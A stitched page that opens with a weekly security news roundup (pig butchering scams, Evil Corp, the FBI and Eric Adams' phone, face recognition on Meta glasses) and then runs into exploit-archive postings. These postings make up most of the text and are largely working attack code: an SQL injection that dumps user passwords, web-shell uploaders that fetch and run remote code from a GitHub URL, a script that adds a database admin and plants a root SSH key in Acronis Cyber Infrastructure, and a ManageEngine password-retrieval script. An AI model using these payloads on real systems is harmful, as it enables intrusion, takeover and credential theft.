Plus: Harvard students pack Meta’s smart glasses with privacy-invading face-recognition tech, Microsoft and the DOJ seize Russian hackers’ domains, and more.

Pig butchering, the crypto-based scammer scourge that has pulled in an estimated $75 billion from victims globally, is spreading beyond its roots in Southeast Asia, with operations proliferating across the Middle East, Eastern Europe, Latin America, and West Africa.

The UK's National Crime Agency disclosed new details about the identities of the Russian ransomware group known as Evil Corp—as well as the group's ties to Russian intelligence agencies and even its direct participation in espionage operations targeting NATO allies.

A WIRED investigation revealed how car-mounted automatic license plate reader cameras are capturing far more than just license plates, including campaign yard signs, bumper stickers, and other politically sensitive text, all examples of how a system for tracking vehicles threatens to become a broader surveillance tool.

In other news, ICE signed a $2 million contract with Paragon Solutions, a known vendor of spyware including the hacking tool Graphite. And the Pentagon is increasingly adopting handheld controllers for weapons systems in an effort provide more intuitive interfaces to soldiers who have grown up playing Xbox and PlayStation consoles.

And there's more. Each week, we round up the privacy and security news we didn’t cover in depth ourselves. Click the headlines to read the full stories. And stay safe out there.

As the politics of America's biggest city have been turned upside down by the criminal charges against New York mayor Eric Adams, there's still a “significant wild card” in the corruption case against him, prosecutors said in court this week: The FBI can't manage to get into his phone.

Prosecutors in the case against Adams, which centers on alleged illegal payments the mayor received from the Turkish government, revealed that the FBI still hasn't cracked the encryption on Adams' personal phone, nearly a year after it was seized. That phone is one of three that the bureau has taken from Adams, but agents seized Adams' personal phone a day later than the other two devices he used in an official capacity. By that time, Adams had not only changed the passcode on the phone from a four digit PIN to six digits—a measure he says he took to prevent staffers from intentionally or unintentionally deleting information from the device. He also claims he immediately “forgot” that code to unlock it.

That very convenient amnesia may leave the FBI and prosecutors in a situation similar to their investigation into the San Bernardino mass shooting carried out by Syed Rizwan Farook in 2016, when the US government demanded Apple help unlock the shooter's encrypted iPhone, leading to a high-profile standoff between the Apple and the FBI. In that case, the cybersecurity firm Azimuth eventually used a closely guarded—and expensive—hacking technique to unlock the device. In Adams' case, prosecutors hinted that the FBI may have to resort to similar measures. “Decryption always catches up with encryption,” a prosecutor in the case, Hagan Scotten, told the judge.

Face recognition is one of only a few technologies that even Facebook and Google have hesitated to integrate into products like Google Glass and the Ray-Ban Meta smart glasses—and rightly so, given the privacy implications of a device that would allow anyone to look at a stranger on the street and immediately determine their phone number and home address. Now, however, a group of Harvard students has shown how easy it is to bolt that face recognition onto Meta's augmented-reality eyewear. The project, known as I-XRAY, integrates with the face-recognition service Pimeyes to let Ray-Ban Meta wearers learn the name of virtually anyone they see and then immediately scour databases of personal information to determine other info about them, including names of family members, phone numbers, and home addresses. The students say they're not releasing the code for their experiment, instead intending it as a demonstration of the privacy-invasive potential of augmented-reality devices. Point made.

If that warning about the privacy risks of AR eyewear needed more reinforcement, Meta this week also conceded to TechCrunch that it will use input from users' smart glasses to train its AI products. Initially, Meta declined to answer TechCrunch's questions about whether and how it would collect information from Ray-Ban Meta smart glasses for use as AI training data, in contrast to companies like OpenAI and Anthropic that explicitly say they don't exploit user inputs to train their AI services. A couple of days later, however, Meta confirmed to TechCrunch that it does in fact use images or video collected through its smart glasses to train its AI, but only if the user submits them to Meta's AI tools. That means anything that a user sees and asks Meta's AI chatbot to comment on or analyze will become part of Meta's massive AI-training data trove.

If you can't arrest Russian hackers, at least you can nab their web domains. That, at least, is the approach this week of the US Justice Department, which along with Microsoft and the NGO Information Sharing and Analysis Center used a lawsuit to take control of more than a hundred web domains that had been used by Russian hackers working for the Kremlin's intelligence and law enforcement agency known as the FSB. Those domains had been exploited in phishing campaigns by the Russian hacker group known as Star Blizzard, which has a history of targeting the typical victims of geopolitical spying such as journalists, think tanks, and NGOs. The domain seizures seem designed in part to head off threats of foreign interference in next month's US election. “Rebuilding infrastructure takes time, absorbs resources, and costs money,” Steven Masada, the assistant general counsel of Microsoft’s Digital Crimes Unit, said in a statement. “Today’s action impacts \[the hackers'\] operations at a critical point in time when foreign interference in US democratic processes is of utmost concern.”

The FBI Still Hasn’t Cracked NYC Mayor Eric Adams’ Phone

MD-Pro version 1.0.76 suffers from remote SQL injection and shell upload vulnerabilities.

    # Exploit Title: MD-Pro 1.0.76. ( SQL injection + shell upload )# Google Dork: intext: Powered by MD-Pro# Date: 2024-08-30# Exploit Author: Emiliano Febbi# Vendor Homepage: https://www.opensourcecms.com/wp-content/uploads/MDPro-website-description.png# Software Link: https://www.opensourcecms.com/mdpro/# Version: 1.0.76.# Tested on: Windows 10        :::   :::   :::::::::                :::::::::  :::::::::   ::::::::       :+:+: :+:+:  :+:    :+:               :+:    :+: :+:    :+: :+:    :+:     +:+ +:+:+ +:+ +:+    +:+               +:+    +:+ +:+    +:+ +:+    +:+     +#+  +:+  +#+ +#+    +:+ +#++:++#++:++ +#++:++#+  +#++:++#:  +#+    +:+     +#+       +#+ +#+    +#+               +#+        +#+    +#+ +#+    +#+     #+#       #+# #+#    #+#               #+#        #+#    #+# #+#    #+#     ###       ### #########                ###        ###    ###  ######## #2024      [code] Proof of concept for MD-Pro 1.0.76. ( SQLi + shell upload )-------------------------------------------------------------Part 1-------------------------------------------------------------------------------The SQLi that I will introduce is an experimental stuff that I am not even 100% sure!#############################################################################################################################################################modules.php?op=modload&name=News&file=article&sid=-1 union all select 1,pn_name,3,4,5,6,7,pn_pass,9,10,11,12,13,14,15,16,17,18,19,20,21,22 FROM md_users--#############################################################################################################################################################-------------------------------------------------------------Part 2--------------------------------------------------------------------------------Vulnerability present in the MD-Pro module ' EW FileManager ' inside the admin panel.The extensive query is: ' index.php?module=ew_filemanager&type=admin ' of the module, now you have to make changes:1# Go to this address * index.php?module=ew_filemanager&type=admin&func=modifyconfig * and change these fields in this way:in default's directory of users files insert ' ./ ' or  ' ../ '2# Add this string in both to the modifiable extensions and to those of images ' htm,html,txt,php ' AND ' jpg,jpeg,png,bmp,gif,php ' (save all).3# Now go to File Manager (now is activated) and you can upload the shell from the basic upload form.[/code]

MD-Pro 1.0.76 Shell Upload / SQL Injection

Computer Laboratory Management System 2024 version 1.0 suffers from a cross site scripting vulnerability.

    ## Titles: LMS2024-1.0 XSS-Reflected Information Disclosure## Author: nu11secur1ty## Date: 00/04/2024## Vendor: https://github.com/oretnom23## Software:https://www.sourcecodester.com/php/17268/computer-laboratory-management-system-using-php-and-mysql.html#google_vignette## Reference: https://portswigger.net/web-security/cross-site-scripting## Description:The value of the username request parameter is copied into the HTMLdocument as plain text between tags. The payload ro2iz<img src=aonerror=alert(1)>xggkt was submitted in the username parameter. This inputwas echoed unmodified in the application's response.STATUS: HIGH- Vulnerability[+]Exploits:- XSS-Reflected:```xssPOST /php-lms/classes/Login.php?f=login HTTP/1.1Host: pwnedhost.comAccept-Encoding: gzip, deflate, brAccept: */*Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/128.0.6613.138 Safari/537.36Connection: closeCache-Control: max-age=0Cookie: PHPSESSID=g61goafu1miq2e737ra7dclqmlOrigin: https://pwnedhost.comX-Requested-With: XMLHttpRequestReferer: https://pwnedhost.com/php-lms/admin/login.phpContent-Type: application/x-www-form-urlencoded; charset=UTF-8Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="128","Chromium";v="128"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0Content-Length: 37username=VLVAuyqjro2iz%3cimg%20src%3da%20onerror%3dalert(1)%3exggkt&password=e3I!x1c!Q7```+ [Response]```HTTP/1.1 200 OKDate: Fri, 04 Oct 2024 08:27:39 GMTServer: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4X-Powered-By: PHP/8.2.4Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheAccess-Control-Allow-Origin: *Content-Length: 177Connection: closeContent-Type: text/html; charset=UTF-8{"status":"incorrect","last_qry":"SELECT * from users where username ='VLVAuyqjro2iz<img src=a onerror=alert(1)>xggkt' and password =md5('45ec487cfe5b3bac8e61740ae8dbcd06') "}```## Reproduce:[href](https://www.patreon.com/nu11secur1ty)## Demo PoC:[href](https://www.patreon.com/nu11secur1ty)## Time spent:00:27:00-- System Administrator - Infrastructure EngineerPenetration Testing EngineerExploit developer at https://packetstormsecurity.com/https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and https://www.exploit-db.com/0day Exploit DataBase https://0day.today/home page: https://www.nu11secur1ty.com/hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=                          nu11secur1ty <http://nu11secur1ty.com/>-- System Administrator - Infrastructure EngineerPenetration Testing EngineerExploit developer at https://packetstormsecurity.com/https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and https://www.exploit-db.com/0day Exploit DataBase https://0day.today/home page: https://www.nu11secur1ty.com/hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=                          nu11secur1ty <http://nu11secur1ty.com/>

Computer Laboratory Management System 2024 1.0 Cross Site Scripting

Acronis Cyber Infrastructure version 5.0.1-61 suffers from a cross site request forgery vulnerability.

    =============================================================================================================================================| # Title     : Acronis Cyber Infrastructure 5.0.1-61 CSRF Add ADmin Vulnerability                                                          || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            || # Vendor    : https://www.acronis.com/en-eu/products/cyber-infrastructure/                                                                |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] add new admin.[+] Line 83 + 100 +138 + 202 set your target .[+] save code as poc.php .[+] USage : cmd => c:\www\test\php poc.php [+] PayLoad :<?phpclass AcronisExploit {    private $sshSocket;    private $dbConn;    private $clusterId;        public function __construct() {        // Initialize default values        $this->sshSocket = null;        $this->dbConn = null;        $this->clusterId = null;    }    // Function to add an admin user to PostgreSQL DB    public function addAdminUser($username, $userid, $password) {        echo "Creating admin user $username with userid $userid\n";        // Insert new admin user into the user table        $resQuery = $this->postgresQuery("INSERT INTO \"user\" VALUES('$userid','{}','T',NULL,NULL,NULL,'default');");        if (!$resQuery) return false;        // Insert new admin user into the local_user table        $resQuery = $this->postgresQuery("SELECT MAX(id) FROM \"local_user\";");        if (!$resQuery) return false;                $idLuser = pg_fetch_result($resQuery, 0, 0) + 1;        $resQuery = $this->postgresQuery("INSERT INTO \"local_user\" VALUES('$idLuser','$userid','default','$username',NULL,NULL);");        if (!$resQuery) return false;        // Hash the password        $passwordHash = password_hash($password, PASSWORD_BCRYPT);        echo "Setting password $password with hash $passwordHash\n";        $today = date('Y-m-d');        $resQuery = $this->postgresQuery("INSERT INTO \"password\" VALUES('$idLuser','$idLuser',NULL,'F','$passwordHash',0,NULL,DATE '$today');");        if (!$resQuery) return false;        // Assign admin roles        $idProjectRole = $this->postgresQuery("SELECT id FROM \"project\" WHERE name = 'admin' AND domain_id = 'default';");        $idAdminRole = $this->postgresQuery("SELECT id FROM \"role\" WHERE name = 'admin';");        echo "Assigning the admin roles: $idProjectRole and $idAdminRole\n";        $this->postgresQuery("INSERT INTO \"assignment\" VALUES('UserProject','$userid','$idProjectRole','$idAdminRole','F');");        echo "Successfully created admin user $username with password $password\n";        return true;    }    // Function to run a PostgreSQL query    private function postgresQuery($query) {        $result = pg_query($this->dbConn, $query);        if (!$result) {            echo "PostgreSQL query failed: " . pg_last_error($this->dbConn) . "\n";            return false;        }        return $result;    }    // Function to login to SSH    public function doSshLogin($ip, $user, $sshKey) {        $connection = ssh2_connect($ip, 22);        if (!$connection) {            echo "SSH connection failed\n";            return false;        }        if (ssh2_auth_pubkey_file($connection, $user, $sshKey['public'], $sshKey['private'])) {            $this->sshSocket = $connection;            return true;        } else {            echo "SSH authentication failed\n";            return false;        }    }    // Function to login to Acronis Cyber Infrastructure web portal    public function aciLogin($name, $pwd) {        $postData = json_encode([            'username' => $name,            'password' => $pwd        ]);        $ch = curl_init();        curl_setopt($ch, CURLOPT_URL, "https://target-uri/api/v2/login");        curl_setopt($ch, CURLOPT_POST, true);        curl_setopt($ch, CURLOPT_POSTFIELDS, $postData);        curl_setopt($ch, CURLOPT_HTTPHEADER, [            'Content-Type: application/json',            'X-Requested-With: XMLHttpRequest'        ]);        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);        $response = curl_exec($ch);        curl_close($ch);        return (strpos($response, '"code":200') !== false);    }    // Function to get the cluster ID    public function getClusterId() {        $ch = curl_init();        curl_setopt($ch, CURLOPT_URL, "https://target-uri/api/v2/clusters");        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);        $response = curl_exec($ch);        curl_close($ch);        $data = json_decode($response, true);        if (isset($data['data'][0]['id'])) {            return $data['data'][0]['id'];        }        return null;    }    // Function to generate SSH keys    private function generateSshKeys() {        $privateKey = tempnam(sys_get_temp_dir(), 'ssh_private');        $publicKey = $privateKey . '.pub';        ssh2_genkeypair($privateKey, $publicKey);        return [            'private' => $privateKey,            'public' => $publicKey        ];    }    // Function to upload SSH public key    public function uploadSshKey($sshKey, $clusterId) {        $postData = json_encode([            'key' => $sshKey,            'event' => [                'name' => 'SshKeys',                'method' => 'post',                'data' => [                    'key' => $sshKey                ]            ]        ]);        $ch = curl_init();        curl_setopt($ch, CURLOPT_URL, "https://target-uri/api/v2/$clusterId/ssh-keys");        curl_setopt($ch, CURLOPT_POST, true);        curl_setopt($ch, CURLOPT_POSTFIELDS, $postData);        curl_setopt($ch, CURLOPT_HTTPHEADER, [            'Content-Type: application/json',            'X-Requested-With: XMLHttpRequest'        ]);        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);        $response = curl_exec($ch);        curl_close($ch);        return (strpos($response, '"task_id"') !== false);    }    // Main exploit function    public function exploit($rhost, $dbPort, $sshPort, $username, $password) {        // Connect to PostgreSQL        $this->dbConn = pg_connect("host=$rhost port=$dbPort dbname=keystone user=vstoradmin password=vstoradmin");        if (!$this->dbConn) {            echo "Could not connect to PostgreSQL database\n";            return false;        }        // Add a new admin user        $newUsername = substr(md5(rand()), 0, 8);        $newPassword = substr(md5(rand()), 0, 16);        $userId = bin2hex(random_bytes(16));        $this->addAdminUser($newUsername, $userId, $newPassword);        // Login to Acronis        if (!$this->aciLogin($newUsername, $newPassword)) {            echo "Failed to login to Acronis\n";            return false;        }        // Get cluster ID        $this->clusterId = $this->getClusterId();        if (!$this->clusterId) {            echo "Failed to get cluster ID\n";            return false;        }        // Generate SSH keys        $sshKey = $this->generateSshKeys();        // Upload SSH public key        if (!$this->uploadSshKey($sshKey['public'], $this->clusterId)) {            echo "Failed to upload SSH public key\n";            return false;        }        // SSH Login        if (!$this->doSshLogin($rhost, 'root', $sshKey)) {            echo "SSH login failed\n";            return false;        }        echo "Exploit successful, SSH session established!\n";        return true;    }}// Example usage$exploit = new AcronisExploit();$exploit->exploit('target-ip', 6432, 22, 'vstoradmin', 'vstoradmin');Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Acronis Cyber Infrastructure 5.0.1-61 Cross Site Request Forgery

Vehicle Service Management System version 1.0 suffers from a PHP code injection vulnerability.

    =============================================================================================================================================| # Title     : Vehicle Service Management System 1.0 php code injection Vulnerability                                                      || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            || # Vendor    : https://www.kashipara.com/project/php/10641/online-vehicle-service-management-system                                        |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] This code injects the malicious file in path : http://$target_ip/uploads/[+] save payload as poc.php[+] usage : C:\www\test>php poc.php localhost/vservice[+] payload :<?phpfunction file_upload($target_ip) {    $file_name = "indoushka.php";    $webshell_payload = "<?php        \$url = 'https://raw.githubusercontent.com/indoushka/txt/main/indoushka.txt';        \$ch = curl_init();        curl_setopt(\$ch, CURLOPT_URL, \$url);        curl_setopt(\$ch, CURLOPT_RETURNTRANSFER, true);        \$output = curl_exec(\$ch);        curl_close(\$ch);        if (\$output) {            include 'data://text/plain;base64,' . base64_encode(\$output);        }    ?>";    $post_fields = array(                'save' => '',        'username' => 'az',        'password' => 'az@gt.gt',      'img' => new CURLFile('data://text/plain;base64,' . base64_encode($webshell_payload), 'application/x-php', $file_name),                  'qty' => '1'    );    $ch = curl_init();    curl_setopt($ch, CURLOPT_URL, "http://$target_ip/classes/Users.php?f=save");    curl_setopt($ch, CURLOPT_POST, 1);    curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);    $response = curl_exec($ch);    curl_close($ch);    echo "(+) Shell uploaded successfully.\n";    echo "(+) Access the shell at: http://$target_ip/uploads/\n";}if ($argc != 2) {    echo "(+) Usage: php " . $argv[0] . " <target ip>\n";    echo "(+) Example: php " . $argv[0] . " 10.0.0.1\n";    exit(-1);}$target_ip = $argv[1];file_upload($target_ip);Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Vehicle Service Management System 1.0 Code Injection

Transport Management System version 1.0 suffers from an arbitrary file upload vulnerability.

=============================================================================================================================================  
| # Title     : Transport Management System 1.0 Remote File Upload Vulnerability                                                            |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            |  
| # Vendor    : https://www.kashipara.xyz/download/project/user/2022/202203/kashipara.com_transport-management-syste.zip                    |  
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following html code uploads a executable malicious file remotely .

[+] Go to the line 6.

[+] Set the target site link Save changes and apply . 

[+] save code as poc.html .

<!DOCTYPE html>  
<html xmlns="http://www.w3.org/1999/xhtml">  
<head profile="http://www.w3.org/2005/10/profile">  
<script data-ad-client="ca-pub-2400875940842439" async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>  
<br>  
            <form class="form-horizontal" action="http://127.0.0.1/Transport-Management/newvehicle.php" method="post" enctype="multipart/form-data">

                                <div class="input-group">  
                  <span class="input-group-addon"><b>Registration Number</b></span>  
                  <input id="vehreg" type="text" class="form-control" name="vehregno" placeholder="Reg No">  
                </div>  
                <br> 

                                 <div class="input-group">  
                  <span class="input-group-addon"><b>Chesis No</b></span>  
                  <input id="vehchesis" type="text" class="form-control" name="vehchesis" placeholder="Chesis No">  
                </div>  
                <br> 

                                <div class="input-group">  
                  <span class="input-group-addon"><b>Brand</b></span>  
                  <input id="vehbrand" type="text" class="form-control" name="vehbrand" placeholder="Brand">  
                </div>  
                <br>

                                <div class="input-group">  
                  <span class="input-group-addon"><b>Color</b></span>  
                  <input id="vehcolor" type="text" class="form-control" name="vehcolor" placeholder="Color">  
                </div>  
                <br>

                                 <div class="input-group">  
                  <span class="input-group-addon"><b>Registration Date</b></span>  
                  <input id="vehregdate" type="text" class="form-control" name="vehregdate" placeholder="Registration date">  
                </div>  
                <br>

                                                               <script>  
                      $( function() {  
                        $( "#vehregdate" ).datepicker();  
                      } );  
                </script> 

                                                <br>

                                 <div class="input-group">  
                  <span class="input-group-addon"><b>Description</b></span>  
                     <textarea rows="5" id="draddress" type="text" class="form-control" name="vehdescription" placeholder="Address"> </textarea>

                                  </div>  
                <br>

                                  
                <div class="input-group">  
                  <span class="input-group-addon"><b>Photo</b></span>  
                  <input  type="file" class="form-control" name="file"> 

              </div>

                                                 <br>

                                <div class="input-group">  
                  <input type="submit" name="submit" class="btn btn-success">

                                  </div>

              </form>     
        </div>    
        <div class="col-md-3"></div>

[+] http://127.0.0.1/Transport-Management/vehicle%20picture/hacked.txt

Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================

Transport Management System 1.0 Arbitrary File Upload

Transport Management System version 1.0 suffers from a PHP code injection vulnerability.

    =============================================================================================================================================| # Title     : Transport Management System 1.0 php code injection Vulnerability                                                            || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            || # Vendor    : https://www.kashipara.xyz/download/project/user/2022/202203/kashipara.com_transport-management-syste.zip                    |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] This payload inject php code contains a shell.[+] save payload as poc.php[+] usage from cmd : C:\www\test>php 2.php 127.0.0.1/Transport-Management/[+] payload :<?phpfunction file_upload($target_ip) {    $file_name = "indoushka.php";    $webshell_payload = "<?php        \$url = 'https://raw.githubusercontent.com/indoushka/txt/main/indoushka.txt';        \$ch = curl_init();        curl_setopt(\$ch, CURLOPT_URL, \$url);        curl_setopt(\$ch, CURLOPT_RETURNTRANSFER, true);        \$output = curl_exec(\$ch);        curl_close(\$ch);        if (\$output) {            include 'data://text/plain;base64,' . base64_encode(\$output);        }    ?>";    $post_fields = array(                'submit' => '',        'vehregno' => '3',    'vehchesis' => '00213771818860',    'vehdescription' => 'hacked by indoushka',    'file' => new CURLFile('data://text/plain;base64,' . base64_encode($webshell_payload), 'application/x-php', $file_name),            'qty' => '1'    );    $ch = curl_init();    curl_setopt($ch, CURLOPT_URL, "http://$target_ip/newvehicle.php");    curl_setopt($ch, CURLOPT_POST, 1);    curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);    $response = curl_exec($ch);    curl_close($ch);    echo "(+) Shell uploaded successfully.\n";    echo "(+) Access the shell at: http://$target_ip/vehicle picture/\n";}if ($argc != 2) {    echo "(+) Usage: php " . $argv[0] . " <target ip>\n";    echo "(+) Example: php " . $argv[0] . " 10.0.0.1\n";    exit(-1);}$target_ip = $argv[1];file_upload($target_ip);Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Transport Management System 1.0 Code Injection

ManageEngine ADManager version 7183 suffers from a password hash disclosure vulnerability.

    =============================================================================================================================================| # Title     : ManageEngine ADManager 7183 Password Hash Disclosure Vulnerability                                                          || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            || # Vendor    : https://www.manageengine.com/products/ad-manager/                                                                           |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] ManageEngine ADManager Plus versions prior to build 7183 suffers from a  Password Hash disclosure vulnerability..[+] save code as poc.php .[+] USage : php poc.php -t <target_url> -a <auth> -u <username> -p <password>[+] PayLoad :<?php// تعطيل تحذيرات HTTPSerror_reporting(0);function getPass($target, $auth, $user, $password) {    // تهيئة Session    $ch = curl_init();        // تحويل نوع المصادقة إذا كان ADManager    if (strtolower($auth) == 'admanager') {        $auth = 'ADManager Plus Authentication';    }        // بيانات تسجيل الدخول    $data = http_build_query([        "is_admp_pass_encrypted" => "false",        "j_username" => $user,        "j_password" => $password,        "domainName" => $auth,        "AUTHRULE_NAME" => "ADAuthenticator"    ]);        // إعدادات الطلب    $url = $target . 'j_security_check?LogoutFromSSO=true';    curl_setopt($ch, CURLOPT_URL, $url);    curl_setopt($ch, CURLOPT_POST, true);    curl_setopt($ch, CURLOPT_POSTFIELDS, $data);    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);    curl_setopt($ch, CURLOPT_HTTPHEADER, [        "User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0",        "Content-Type: application/x-www-form-urlencoded"    ]);    // إرسال الطلب    $response = curl_exec($ch);        // التحقق من المصادقة    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);    if (strpos($response, 'Cookie') !== false) {        echo "[+] Authentication successful!\n";    } elseif ($http_code == 200) {        echo "[-] Invalid login name/password!\n";        exit(0);    } else {        echo "[-] Something went wrong!\n";        exit(1);    }    // استرجاع كلمة المرور    for ($i = 1; $i <= 5; $i++) {        echo "[*] Trying to fetch recovery password for domainId: $i!\n";        $passUrl = $target . 'ConfigureRecoverySettings/GET_PASS?req=%7B%22domainId%22%3A%22' . $i . '%22%7D';        curl_setopt($ch, CURLOPT_URL, $passUrl);        curl_setopt($ch, CURLOPT_POST, false);        $passResponse = curl_exec($ch);                if ($passResponse) {            echo $passResponse . "\n";        }    }    curl_close($ch);}function get_args() {    global $argv;    $args = [        'target' => '',        'auth' => '',        'user' => '',        'password' => ''    ];    for ($i = 1; $i < count($argv); $i++) {        switch ($argv[$i]) {            case '-t':            case '--target':                $args['target'] = $argv[++$i];                break;            case '-a':            case '--auth':                $args['auth'] = $argv[++$i];                break;            case '-u':            case '--user':                $args['user'] = $argv[++$i];                break;            case '-p':            case '--password':                $args['password'] = $argv[++$i];                break;        }    }    return $args;}function main() {    $args = get_args();    if (!$args['target'] || !$args['auth'] || !$args['user'] || !$args['password']) {        echo "Usage: php exploit.php -t <target_url> -a <auth> -u <username> -p <password>\n";        exit(1);    }    getPass($args['target'], $args['auth'], $args['user'], $args['password']);}main();?>Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

ManageEngine ADManager 7183 Password Hash Disclosure

An incorrect searching algorithm in fastrpc_mmap_find can lead to kernel address space information leaks.

    Inside of fastrpc_mmap_find, there exists the following code to search for ADSP_MMAP_HEAP_ADDR or ADSP_MMAP_REMOTE_HEAP_ADDR allocations:hlist_for_each_entry_safe(map, n, &me->maps, hn) {      if (va >= map->va &&      va + len <= map->va + map->len &&      map->fd == fd) {          if (refs) {              if (map->refs + 1 == INT_MAX) {                   spin_unlock_irqrestore(&me->hlock, irq_flags);                   return -ETOOMANYREFS;              }             map->refs++;          }          match = map;          break;      }                  }   This code is wrong at a couple different levels, particularly in the case of a fastrpc_mmap_create-->fastrpc_mmap_find call coming from userland such as in the FASTRPC_IOCTL_MEM_MAP ioctl. I think this code path may not be intended to be reachable from userland at all - although even for requests issued from kernel-land, the contract for this code appears to have some correctness issues. This code uses map->va for finding an associated mapping which for these heap addresses comes from a call to dma_alloc_attrs inside of fastrpc_alloc_cma_memory.  dma_alloc_attrs has two different modes of operation - one returns a kernel virtual address to the allocated memory, and the other returns a struct page pointer that serves as an opaque cookie for the allocated memory. We have the latter case for this invocation of dma_alloc_attrs because of the DMA_ATTR_NO_KERNEL_MAPPING flag applied in fastrpc_mmap_create_remote_heap. We can see this looking at the debugfs-visible global file in the adsprpc directory:===================================  GMAPS  ====================================  fd                  |phys                |size                |va                    --------------------------------------------------------------------------------  -1                  |0xE883A000          |0x1000              |0xFFFFFFFE01A20E80       -1                  |0xE8839000          |0x1000              |0xFFFFFFFE01A20E40       -1                  |0xE8838000          |0x1000              |0xFFFFFFFE01A20E00       -1                  |0xE8837000          |0x1000              |0xFFFFFFFE01A20DC0       -1                  |0xE8836000          |0x1000              |0xFFFFFFFE01A20D80       -1                  |0xE8835000          |0x1000              |0xFFFFFFFE01A20D40       0                   |0xE8834000          |0x1000              |0xFFFFFFFE01A20D00       0                   |0xE8833000          |0x1000              |0xFFFFFFFE01A20CC0       0                   |0xE8832000          |0x1000              |0xFFFFFFFE01A20C80       -1                  |0xE8900000          |0x200000            |0xFFFFFFFE01A24000      This means we end up comparing a userland supplied value against a kernel page pointer - behavior of the kernel ioctl FASTRPC_IOCTL_MEM_MAP differs in userland visible ways based on the outcome of the comparison, meaning that userland can leak kernel page pointer addresses by "guessing" a possible address and observing the resulting error code. Here is the output from the attached PoC on a Samsung S23:  dm1q:/data/local/tmp $ ./poc  Detected address 0xfffffffe01c00000  Final address: 0xfffffffe01a24000   Additionally, because map->va is a struct page pointer as opposed to a genuine address to the underlying buffer, the usage of map->va + map->len is incorrect, and can lead to there being multiple map matches for the same calling parameters.  **This bug is subject to a 90-day disclosure deadline. If a fix for this**  **issue is made available to users before the end of the 90-day deadline,**  **this bug report will become public 30 days after the fix was made**  **available. Otherwise, this bug report will become public at the deadline.**  The scheduled deadline is 2024-09-22.   **For more details, see the Project Zero vulnerability disclosure policy:**  **https://googleprojectzero.blogspot.com/p/vulnerability-disclosure-**   **policy.html** Related CVE Number: CVE-2024-33060.

fastrpc_mmap_find Information Leak

There appears to be some (possibly deprecated) code associated with AF_QIPCRTR sockets in bpf_service.c. Within this file are some ioctl handlers - e.g. qrtr_bpf_filter_attach and qrtr_bpf_filter_detach. In the case of qrtr_bpf_filter_detach, the global pointer bpf_filter is fetched and freed while only holding a socket lock (and an irrelevant rcu_read_lock) - this may lead directly to double frees or use-after-free (kernel memory corruption) if a malicious user is able to call the QRTR_DETTACH_BPF ioctl on multiple AF_QIPCRTR sockets at once. Based on Android SELinux files, it appears this may be possible from some lower-privileged vendor and HAL services.

